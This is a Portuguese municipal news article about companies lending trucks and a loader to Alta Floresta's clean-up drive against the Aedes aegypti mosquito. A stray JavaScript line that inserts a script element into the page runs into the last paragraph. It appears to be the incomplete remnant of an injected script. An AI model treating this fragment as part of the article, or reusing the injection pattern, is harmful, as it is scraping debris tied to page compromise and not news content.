Capa / Em Destaque / Empresas aderem ao Mutirão de Limpeza e cedem máquinas

Empresas aderem ao Mutirão de Limpeza e cedem máquinas

GEDSC DIGITAL CAMERA

Lindomar Leal
Assessoria da PMAF

O Mutirão de Limpeza que está sendo executado pela Secretaria de Infraestrutura e a Força Tarefa realizada pela Secretaria de Saúde desde o dia 11, segunda-feira, em Alta Floresta, ganhou reforço importantíssimo na última quinta-feira, 14, com a chegada de 2 caminhões basculantes e 1 pá carregadeira. O maquinário foi cedido por quinze dias pela empresa Buriti Empreendimentos.
Este foi o segundo reforço que a campanha recebeu em menos de uma semana. A empresa Arte Jones Extração e Comércio de Areia havia enviado, no começo da semana, um caminhão basculante para auxiliar na remoção do lixo e do entulho.
Com a incorporação dessas máquinas, a frota envolvida na limpeza dosbairros, disponibilizada pela Secretaria de Infraestrutura, passou a contar com 8 caminhões basculantes, 4 pás carregadeiras, 1 trator com roçadeira, 9 roçadeiras manuais, 3 motoniveladoras e trinta funcionários da Prefeitura. A limpeza do lixo seco e do entulho faz parte do plano emergencial de combate à proliferação do mosquito Aedes aegypti, transmissor da Dengue, do Zika vírus e Chicungunya.
O Mutirão começou pelo bairro Jardim Panorama e já passou pelo Jardim Renascer, Jardim Primavera e Jardim das Oliveiras. Em cinco dias de trabalho, nesses quatro bairros, foram retiradas aproximadamente duzentos e trinta cargas de lixo seco e entulhos. A Secretaria de Infraestrutura também está patrolando as ruas e cascalhando os pontos mais críticos das ruas e avenidas dos bairros para mantê-las em condições de trafegabilidade.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top